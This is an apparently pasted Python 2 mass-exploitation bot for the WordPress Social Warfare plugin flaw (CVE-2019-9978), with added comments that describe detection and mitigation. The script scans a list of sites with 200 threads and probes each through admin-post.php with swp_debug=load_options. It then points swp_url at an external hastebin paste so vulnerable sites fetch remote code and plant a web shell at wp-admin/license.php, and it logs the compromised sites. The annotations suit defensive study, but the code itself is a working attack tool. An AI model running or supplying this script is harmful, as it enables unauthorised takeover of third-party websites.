ToKeiChun

Wordpress Social Warfare Remote Code Execution (AUTO UPLOAD SHELL)

Sep 22nd, 2020 (edited)
  1. # -*- coding: utf-8 -*
  2. #!/usr/bin/python
  3. #####################################
  4. ##KILL THE NET##
  5. #### PS: CHANGE Your Threads pool on line 136 to make script more faster :)
  6. ## usage : python script.py list-of-sites.txt
  7. ## source : https://github.com/KTN1990/CVE-2019-9978
  8. ##############[LIBS]###################
  9. import requests, re, urllib2, os, sys, codecs, random              
  10. from multiprocessing.dummy import Pool                          
  11. from time import time as timer  
  12. import time
  13. from urlparse import urlparse
  14. import warnings
  15. import subprocess
  16. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  17. warnings.simplefilter('ignore',InsecureRequestWarning)
      # The line above silences the InsecureRequestWarning that the verify=False requests further down
      # would otherwise emit on every call.
  18. reload(sys)  
  19. sys.setdefaultencoding('utf8')
      # Python 2 only: reload(sys) makes setdefaultencoding available again so the process-wide default
      # string encoding can be forced to UTF-8.
  20. ##########################################################################################
      # ANSI colour escape sequences used to tint console output; CEND resets the colour.
  21. ktnred = '\033[31m'
  22. ktngreen = '\033[32m'
  23. ktn3yell = '\033[33m'
  24. ktn4blue = '\033[34m'
  25. ktn5purp = '\033[35m'
  26. ktn6blueblue = '\033[36m'
  27. ktn7grey = '\033[37m'
  28. CEND = '\033[0m'        
  29. #####################################
  30. ##########################################################################################
      # Reads the list of site URLs, one per line, from the file named by argv[1]. The file is decoded
      # as ASCII with errors='ignore', so any non-ASCII bytes are dropped without notice.
      # Only IndexError (no argument given) is handled. In that case ooo is never bound and the
      # list() call after the handler raises NameError.
  31. try:
  32.     with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
  33.         ooo = f.read().splitlines()
  34. except IndexError:
  35.     print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' listsite.txt' + CEND)
  36.     pass
  37. ooo = list((ooo))
  38. ##########################################################################################
  39. def uploadrce(url):
          # Second stage; rce_check() calls this for a site it has flagged. It makes two requests:
          #   1. GET <url>/wp-admin/admin-post.php with swp_debug=load_options and swp_url pointing at an
          #      externally hosted raw paste. The paste's contents are not part of this listing.
          #   2. GET <url>/wp-admin/license.php, then a search of the body for the marker 'kill_the_net'.
          # A hit is printed and the license.php URL is appended to shells_rce.txt.
          #
          # Detection: in web access logs, look for an admin-post.php request carrying
          # swp_debug=load_options with a non-empty swp_url, followed from the same client by a request
          # for /wp-admin/license.php. The User-Agent below is the same fixed string in all three request
          # functions, but it is trivially changed and so is only a weak indicator.
          # Triage: a wp-admin/license.php file containing the marker is what this script treats as
          # proof of success. NOTE(review): confirm against a clean WordPress tree that core does not
          # ship a file of that name before relying on its presence alone.
          # Mitigation: the file header cites CVE-2019-9978 and the page title names the Social Warfare
          # plugin. Check the installed plugin release against the vendor advisory for that CVE.
          # Presumably the target fetches swp_url server-side, in which case restricting outbound HTTP
          # from the web server would also limit this. TODO: confirm against the advisory.
          #
          # The Legion=id parameter is sent as well; its purpose is not evident from this listing.
          # verify=False disables TLS certificate validation. The bare except discards every error, and
          # the results file is opened without an explicit close.
  40.     try:
  41.         upload = url + '/wp-admin/admin-post.php?Legion=id&swp_debug=load_options&swp_url=https://hastebin.com/raw/iropememif'
  42.         Agent2 = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  43.         se2 = requests.session()
  44.         ktn3 = se2.get(upload, headers=Agent2, verify=False, timeout=10)
  45.         check = url + '/wp-admin/license.php'
  46.         ktn4 = se2.get(check, headers=Agent2, verify=False, timeout=10)
  47.         if 'kill_the_net' in ktn4.content:
  48.             print(ktn3yell + 'SHELL UPLOADED ====> [' + check + ']' + CEND)
  49.             open('shells_rce.txt', 'a').write(check+'\n')
  50.             pass
  51.         else:
  52.             print(ktnred + 'SHELL NOT-UPLOADED ====> [' + check + ']' + CEND)
  53.         pass
  54.     except:
  55.         pass
  56.     pass
  57. def rce_check(url):
          # Probe stage. Sends one GET to <url>/wp-admin/admin-post.php with swp_debug=load_options and
          # an empty swp_url, using a fresh session with no cookies or credentials set in this code.
          # The literal 'nothing found' in the response body is taken as the sign of a vulnerable
          # install. Presumably that text comes from the plugin's debug handler; confirm against the
          # plugin source. A match is appended to rcewp.txt and handed to uploadrce().
          #
          # Detection: this probe is the earliest signal in the chain. A request to admin-post.php with
          # swp_debug=load_options and an empty swp_url has no visible legitimate caller in this listing
          # and can be alerted on or blocked at a WAF or reverse proxy before any second-stage request.
          #
          # The bare except hides every failure, so a target that errors out produces no console output.
  58.     try:
  59.         payload = url + '/wp-admin/admin-post.php?Legion=id&swp_debug=load_options&swp_url='
  60.         Agent1 = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  61.         se1 = requests.session()
  62.         ktn2 = se1.get(payload, headers=Agent1, verify=False, timeout=10)
  63.         if 'nothing found' in ktn2.content.encode('utf-8'):
  64.             print (ktn4blue + 'SITE VULN [' + url + ']' + CEND)
  65.             open('rcewp.txt', 'a').write(url+'\n')
  66.             uploadrce(url)
  67.             pass
  68.         else:
  69.             print (ktn7grey + 'SITE NOT VULN ..... [' + url + ']' + CEND)
  70.             pass       
  71.     except:
  72.         pass
  73.     pass
  74.  
  75. def check(url):
          # Liveness stage and per-target entry point (Main() maps this over the loaded list).
          # Issues a plain GET for the URL as given. Only an HTTP 200 proceeds to rce_check(); any other
          # status is reported as a dead site.
          #
          # On a read or connect timeout the function calls itself again with the same URL and no retry
          # limit, so a host that keeps timing out keeps receiving requests from the same source until
          # the recursion limit is reached. Other connection errors are reported once and dropped.
          #
          # Detection: the first request for each target is an ordinary page fetch, so on its own it is
          # not distinctive. It becomes a useful correlation point when the same client follows it with
          # the admin-post.php request made by rce_check().
  76.     try:
  77.         Agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  78.         se = requests.session()
  79.         ktn1 = se.get(url, headers=Agent, verify=False, timeout=10)
  80.         if ktn1.status_code == 200:
  81.             print (ktngreen + 'SEARCHING FOR VULN ..... [' + url + ']' + CEND)
  82.             rce_check(url)
  83.             pass
  84.         else:
  85.             print (ktnred + 'DEAD SITE: ' + url + CEND)
  86.  
  87.         pass
  88.     except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as a:
  89.         print (ktnred + 'TIME OUT: ' + url + CEND)
  90.         check(url)
  91.         pass
  92.     except requests.exceptions.ConnectionError as b:
  93.         print (ktnred + 'DEAD SITE2: ' + url + CEND)
  94.         pass
  95.     pass
  96.  
  97.  
  98. #####################################
  99. def logo():
          # Cosmetic only: prints the ASCII banner one line at a time, each line in a colour picked at
          # random from `colors`, with a 0.05 s pause between lines. The index N from enumerate() is
          # unused. No network or file activity happens here.
  100.     clear = "\x1b[0m"
  101.     colors = [36, 32, 34, 35, 31, 37]
  102.     x = '''
  103.         FEDERATION BLACK HAT SYSTEM | IG: @_gghost666_
  104.                              ...
  105.           s,                .                    .s
  106.            ss,              . ..               .ss
  107.            'SsSs,           ..  .           .sSsS'
  108.             sSs'sSs,        .   .        .sSs'sSs
  109.              sSs  'sSs,      ...      .sSs'  sSs
  110.               sS,    'sSs,         .sSs'    .Ss
  111.               'Ss       'sSs,   .sSs'       sS'
  112.      ...       sSs         ' .sSs'         sSs       ...
  113.     .           sSs       .sSs' ..,       sSs       .
  114.     . ..         sS,   .sSs'  .  'sSs,   .Ss        . ..
  115.     ..  .        'Ss .Ss'     .     'sSs. ''        ..  .
  116.     .   .         sSs '       .        'sSs,        .   .
  117.      ...      .sS.'sSs        .        .. 'sSs,      ...
  118.            .sSs'    sS,     .....     .Ss    'sSs,
  119.         .sSs'       'Ss       .       sS'       'sSs,
  120.      .sSs'           sSs      .      sSs           'sSs,
  121.   .sSs'____________________________ sSs ______________'sSs,
  122. .sSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS'.Ss SSSSSSSSSSSSSSSSSSSSSs,
  123.                        ...         sS'
  124.                         sSs       sSs
  125.                          sSs     sSs       - KTN
  126.                           sS,   .Ss
  127.                           'Ss   sS'
  128.                            sSs sSs
  129.                             sSsSs
  130.                              sSs
  131.                               s  
  132.                                      KILL THE NET
  133.                                     FB: fb/KtN.1990  
  134.               Note! : PRIVATE WORDPRESS RCE BOT '''
  135.  
  136.     for N, line in enumerate(x.split("\n")):
  137.         sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
  138.         time.sleep(0.05)
  139.         pass
  140.  
  141.  
  142. logo()
       # Runs at module load, ahead of the __main__ guard, so the banner prints even when the file is
       # only imported.
  143. ##########################################################################################
  144. def Main():
           # Runs check() over every entry in the module-level list `ooo` using a pool of 200 workers.
           # Pool comes from multiprocessing.dummy, so the workers are threads, not processes.
           # Prints the elapsed wall-clock time when the map completes.
           #
           # Detection: each target receives only a handful of requests (one page fetch, one
           # admin-post.php probe, and two more if the probe matches). Per-host rate limits are unlikely
           # to trip, so key alerts on the swp_debug/swp_url request pattern instead of request volume.
           #
           # The bare except hides any failure raised while the pool is running.
  145.     try:
  146.        
  147.         start = timer()
  148.         ThreadPool = Pool(200)
  149.         Threads = ThreadPool.map(check, ooo)
  150.         print('TIME TAKE: ' + str(timer() - start) + ' S')
  151.     except:
  152.         pass
  153.  
  154.  
  155. if __name__ == '__main__':
           # Entry point when executed as a script. The target list has already been read and the
           # banner already printed by module-level code before this guard is reached.
  156.     Main()
  157.  